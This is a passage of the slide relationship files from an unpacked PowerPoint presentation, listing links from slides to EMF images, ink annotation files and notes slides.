Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image586.emf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37.xml"/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7.emf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38.xml"/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8.emf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39.xml"/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9.emf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2.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1045.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1040.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1042.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image560.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide204.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56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1.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1044.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1041.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1046.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image593.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image590.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1043.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image562.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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6.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1052.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image572.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1047.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1049.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image568.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1054.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide205.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image570.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57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5.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1051.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1048.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1053.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image567.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1055.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image564.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1050.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image569.emf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2.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink121.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink116.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink125.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink118.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image900.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink123.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink127.xml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92.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1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0.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink120.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image850.emf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink117.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink122.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink126.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image890.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink124.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink130.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image860.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink119.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image910.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image840.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink128.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image113.emf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20.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1061.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image597.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1056.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1065.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1058.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image594.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1063.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide208.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image596.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57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10.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1060.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1057.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1062.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5930.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1064.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5900.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1059.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image595.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image599.emf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1.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1071.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image606.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image610.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1066.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1075.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1068.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image603.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1073.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1077.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide210.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image605.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60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0.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1070.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image609.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1067.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1072.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1076.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image602.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1074.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5990.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1069.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image604.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image608.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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80.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image616.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1085.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1089.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image619.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image613.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1082.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image617.emf"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image621.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide211.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1084.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink108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79.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image615.emf"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1088.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image612.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image611.emf"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image620.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1081.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image618.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1078.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image614.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1083.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1087.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image622.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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92.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6220.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1097.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1101.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image626.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6190.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1094.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image624.emf"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image627.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide212.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1096.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1098.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image629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91.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6210.emf"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1100.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6180.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image623.emf"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6111.emf"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1102.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1093.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image625.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1090.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6200.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1095.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1099.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image628.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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90.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1103.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1105.xm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80.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1104.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image630.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6270.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1106.xml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71.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1112.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1107.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1109.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image633.emf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1.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1111.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1108.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1113.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1114.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image632.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6300.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1110.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image634.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image638.emf"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image642.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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40.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1120.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6390.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1115.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1124.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1117.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6360.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1122.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide215.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6380.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image640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30.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1119.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1116.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1121.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6350.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1123.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6320.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1118.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6370.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image646.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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20.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1130.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image647.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1125.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1127.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6440.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1132.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide216.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6460.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64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10.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1129.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1126.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1131.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6430.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1133.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6400.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1128.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image645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10.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink131.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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1.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1139.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image656.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1134.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1143.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1136.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image653.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1141.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide217.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image655.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65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emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1138.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1135.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1140.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image652.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1142.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image649.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1137.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image654.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image658.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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46.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image661.emf"/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45.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image663.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image660.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1147.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1144.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image662.emf"/></Relationships>
</file>

